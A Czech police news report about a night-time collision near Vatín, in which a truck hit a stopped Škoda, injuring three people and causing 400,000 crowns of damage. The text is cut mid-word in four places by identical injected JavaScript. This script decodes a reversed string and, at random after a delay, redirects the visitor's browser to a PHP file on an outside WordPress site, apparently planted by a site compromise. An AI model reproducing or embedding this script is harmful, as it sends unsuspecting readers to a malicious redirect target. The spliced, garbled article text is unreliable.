Rainbow page separator

Při noční nehodě se zranili tři lidé, škoda je 400 tisíc korun

Úterý, 24. dubna 2018

Policie České republiky

Vatín / Po „sedmatřicítce“ od obce Vatín k vedlejšímu Sazomínu jel v sobotu kolem půl jedné v noci devětatřicetiletý řidič s nákladní soupravou tvořenou tahačem s návěsem.
„Při jízdě na přímém úseku komunikace v klesání nejel takovou rychlostí, aby byl schopen zastavit vozidlo na vzdálenost, na kterou má rozhled, a narazil přední částí auta do před ním s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tojící Škody Rapid. Její řidič zastavil před přenosnou soustavou na signál „stůj“ v úseku, kde je snížená rychlost na 50 kilometrů v hodině,“ přiblížila policejní mluvčí Dana Čírtková. Škodovku náraz odhodil vpravo mimo silnici, kde narazila do svodidel.
Při dopravní nehodě byl těžce zraněn spolujedoucí z osobního auta, který musel být letecky transpor[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tován do nemocnice v Brně. „Dále došlo k lehkému zranění řidiče a spolujedoucí z osobního vozidla. Oba byli převezeni do nemocnice v Novém Městě k vyšetření. Ke zranění jiných osob nedošlo,“ doplnila mluvčí. U obou šoférů byla provedena zkouška na alkohol, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to s negativním výsledkem. Další okolnosti nehody, při níž vznikla hmotná škoda ve výši 400 tisíc korun, jsou předmětem vyšetřování policistů ze žďárského dopravního inspek[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torátu.